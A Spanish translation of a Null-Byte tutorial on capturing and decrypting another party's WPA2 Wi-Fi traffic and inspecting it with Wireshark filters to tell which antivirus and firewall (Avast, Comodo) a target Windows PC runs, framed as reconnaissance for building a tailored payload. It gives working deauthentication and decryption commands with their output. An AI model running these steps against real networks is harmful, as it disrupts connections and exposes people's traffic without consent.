Laboratorio: Cómo identificar el software antivirus instalado en una PC con Windows. #Null-Byte

Artículo publicado en: https://null-byte.wonderhowto.com/how-to/hacking-windows-10-identify-antivirus-software-installed-windows-pc-0198775/

Determinar el software antivirus y cortafuegos instalado en una computadora con Windows es crucial para que un atacante se prepare para crear un stager o carga útil específica. Con la inspección encubierta de paquetes profundos, esa información se identifica fácilmente.

Este ataque supone que la contraseña de Wi-Fi para la red de destino ya se conoce . Con la contraseña, un atacante puede observar los datos que atraviesan la red y enumerar el software de seguridad instalado. Las soluciones populares de antivirus y firewall se pueden identificar fácilmente cuando se filtra el tráfico web benigno.

Aprenderemos cómo capturar y descifrar el tráfico de Wi-Fi sin autenticar el enrutador de destino, y realizaremos una inspección de paquetes para descubrir los tipos de aplicaciones de seguridad de terceros instaladas en el sistema operativo.

Paso 1. Capture el tráfico de Wi-Fi

Para comenzar en Kali, use el comando airmon-ng para detener todos los procesos que se ejecutan en segundo plano y que pueden interferir con la tarjeta inalámbrica.

~# airmon-ng check kill

Killing these processes:

  PID Name
 2891 wpa_supplicant

Habilite el modo de monitor en el adaptador Alfa (u otro adaptador inalámbrico ) con el comando airmon-ng start wlan0 .

~# airmon-ng start wlan0

PHY Interface   Driver      Chipset

phy2    wlan0       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

        (mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
        (mac80211 station mode vif disabled for [phy2]wlan0)

Luego, realice una exploración inicial de airodump-ng para enumerar las redes Wi-Fi en el área circundante.

~# airodump-ng wlan0mon

 CH  6 ][ Elapsed: 36 s ][ 2020-04-06 20:45

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -19       13        6    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Cuando se haya identificado el enrutador, presione Control-C para detener el escaneo. Realice una captura de paquetes dirigida contra el enrutador Wi-Fi incluyendo las opciones –channel , –write , –bssid y –essid .

~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon

 CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -20 100     8308     1895    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Aireply-ng des autenticará los dispositivos conectados al enrutador. Este comando es necesario para capturar los datos del protocolo de enlace WPA2. Los paquetes capturados solo se pueden descifrar con un protocolo de enlace válido.

Abra una nueva terminal y use el siguiente comando aireplay-ng para enviar tres paquetes «deauth» al enrutador, forzando a los usuarios autenticados a reconectarse.

~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon

05:12:46  Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]

Un ataque exitoso producirá la notificación «WPA handshake» en la esquina superior derecha de la terminal airodump-ng .

CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -20 100     8308     1895    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

En este punto, la ventana airodump-ng debería continuar capturando paquetes durante el mayor tiempo posible (es decir, muchas horas). A medida que pasa el tiempo, el software de seguridad en la computadora con Windows 10 objetivo intentará actualizar periódicamente la aplicación y las bases de datos de definición de virus. Estas consultas web son valiosas para un hacker con acceso a la red que se prepara para montar un ataque dirigido.

Paso 2. Descifrar el PCAP

Airdecap-ng es una herramienta de descifrado de captura de paquetes y parte de la suite Aircrack-ng.

~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap

Total number of stations seen            8
Total number of packets read         32310
Total number of WEP data packets         0
Total number of WPA data packets      4555
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets      3435
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0

Airdecap-ng usará el ESSID de Wi-Fi (-e) y la contraseña (-p) para descifrar y filtrar los paquetes que pertenecen a la red. En el ejemplo anterior, podemos ver 3435 paquetes descifrados WPA. Airdecap-ng creará un archivo llamado «capture-01-dec.cap» en el directorio actual.

Después de descifrar el PCAP, importe el nuevo archivo capture-01-dec.cap a Wireshark .

Paso 3. Busque el software antivirus (Avast)

Avast es una de las soluciones de software antivirales más populares del mundo.

Los dominios conocidos de Avast incluyen avast.com y avcdn.net, su red principal de distribución de contenido (CDN). Diariamente, estos dominios se utilizan para obtener bases de datos de virus y actualizaciones de software, así como enviar información de telemetría. Estos dominios se pueden filtrar en Wireshark con el siguiente filtro de visualización.

ip.host ~ "(?i)(avast|avcdn)\.*"

Se pueden agregar muchos dominios antivirus al filtro y separarlos mediante barras verticales (|).

Los resultados anteriores son una fuerte indicación de que la computadora está utilizando el software antivirus Avast. Los datos se pueden inspeccionar más a fondo para identificar las cadenas de agente de usuario comúnmente utilizadas por este proveedor de antivirus.

http.user_agent ~ "(?i)avast*"

Esta secuencia HTTP particular invocó una solicitud POST y entregó algunos datos sin cifrar a un servidor Avast. Como podemos ver, la solicitud se originó en la computadora con Windows 10 con un agente de usuario de Avast.

El cuerpo de la secuencia HTTP contiene algunos datos no cifrados relacionados con el dispositivo de destino. El tipo de CPU, el nombre de host de Windows 10 y la arquitectura de la placa base, así como la versión de Avast y los ajustes de configuración, se pueden descubrir desde una sola secuencia HTTP.

POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:

GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041

Estos datos son muy valiosos para un atacante en la red, ya que les permite crear una carga específica para ese usuario y sistema operativo.

Además de Wireshark, tshark y grep pueden imprimir y filtrar fácilmente las solicitudes de DNS, respectivamente, en la salida estándar. Agregue sort -u al comando para mostrar solo dominios únicos (es decir, sin duplicados).

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast\|avcdn" | sort -u

b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com

Paso 4. Búsqueda de software de firewall (Comodo)

Comodo Firewall es una solución de firewall popular diseñada para monitorear el tráfico entrante y saliente para identificar amenazas y prevenir ataques.

Su configuración del servidor DNS hace que sea difícil para los atacantes de la red a las aplicaciones instaladas enumerar y los sitios web visitados. Aún así, el software de Comodo ocasionalmente verificará si hay actualizaciones de software que le brinden al atacante toda la información que necesitan.

ip.host ~ "(?i)(comodo)\.*"

Para ver los dominios consultados en la salida estándar, examine el PCAP con tshark y filtre las solicitudes de DNS.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name

Es probable que este comando produzca una salida grande que contenga miles de dominios, direcciones IP y entradas duplicadas. Agregue los comandos sort y uniq para contar los servidores más consultados.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c

      2 218.0.101.95.in-addr.arpa
     72 22.70.154.156.in-addr.arpa
     14 22.71.154.156.in-addr.arpa
      1 download.comodo.com
      1 ncc.avast.com
      1 su.ff.avast.com
      2 v10.vortex-win.data.microsoft.com
      1 wireshark.org

Observe que la dirección 22.70.154.156.in-addr.arpa aparece 72 veces en el PCAP. Una búsqueda rápida y búsqueda de IP sugiere que 156.154.70.22 ha sido un servidor DNS de Comodo durante muchos años. Si bien esto no significa definitivamente que el objetivo tenga instalado el software Comodo, sugeriría que son conscientes de la seguridad.

Pensamientos finales…

Este artículo cubre solo unos pocos filtros de pantalla Wireshark . Hay muchos filtros HTTP , IP y DNS que ayudarían a un pirata informático mientras recopila información sobre el objetivo.

Con una lista completa de software antivirus popular , un atacante generalmente podrá decir con certeza si una máquina Windows objetivo tiene instalado un software de seguridad. Lo que da más miedo es que la enumeración de software se logra sin conectarse a la red Wi-Fi o sin necesidad de acceso físico a la computadora.

The following two tabs change content below.
Consultor freelance de Ciberseguridad. Técnico Superior Informático en Desarrollo de Aplicaciones Multiplataforma y Perito Judicial Informático Forense inscrito con el nº 120 en la Asociación Profesional de Peritos de las Nuevas Tecnologías (PETEC). **Profesional del campo de la Informática desde el año 1988, desarrollando diversos perfiles ocupacionales. Desarrollador Web, Programador de soluciones a medida en diversos lenguajes: Clipper, C++, Visual Basic y Visual Basic .NET. **En el campo de la pericial informática: * Especializado en la identificación, extracción y análisis de evidencias digitales en dispositivos de almacenamiento físicos. * Autentificación y Verificación de correos electrónicos. * Suplantación de identidad y verificación de mensajes en redes sociales. * Recuperación de datos de dispositivos de almacenamiento físicos. * Peritación informática sobre el uso de aplicaciones informáticas durante la actividad laboral. * Fraudes informáticos y phising. ............ Radioaficionado desde hace más de 30 años y fotógrafo nocturno, disfrutando de la noche admirando el patrimonio nacional con otros ojos.